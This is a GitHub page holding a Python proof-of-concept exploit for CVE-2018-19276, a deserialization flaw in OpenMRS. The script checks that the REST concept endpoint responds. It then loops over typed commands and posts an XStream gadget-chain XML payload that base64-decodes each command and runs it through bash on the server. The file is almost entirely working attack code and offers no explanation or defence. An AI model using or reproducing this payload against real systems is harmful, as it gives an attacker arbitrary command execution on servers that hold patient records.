-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathCVE-2018-19276.py
60 lines (47 loc) · 4.29 KB
/
CVE-2018-19276.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import base64
import requests
import sys
import re
# for java8
remote = "http://127.0.0.1:8888/"
ressource = "/openmrs/ws/rest/v1/concept"
proxy = {
}
if __name__ == "__main__":
print("\nCVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE\n")
print("[+] Checking if ressource available =>", end=' ')
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/xml"}
r = requests.post(burp0_url, headers=burp0_headers, proxies=proxy,
verify=False, allow_redirects=False)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO, ressource doesn't exist")
sys.exit()
while True:
try:
command = input("command (\033[92mnot reflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
print("[+] Executing command =>", end=' ')
burp0_url = "http://127.0.0.1:8888/openmrs/ws/rest/v1/concept"
burp0_headers = {"Content-Type": "text/xml"}
burp0_data = "<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/bash</string>\r\n <string>-c</string>\r\n \t\t\t<string>{echo," + command_str + \
"}|{base64,-d}|{bash,-i}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>"
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy,
verify=False, allow_redirects=False)
if r.status_code == 500:
m = re.search(
'(java.util.HashMap)', r.text)
if m:
print("\033[92mOK\033[0m")
else:
print("KO")
except KeyboardInterrupt:
print("Exiting...")
break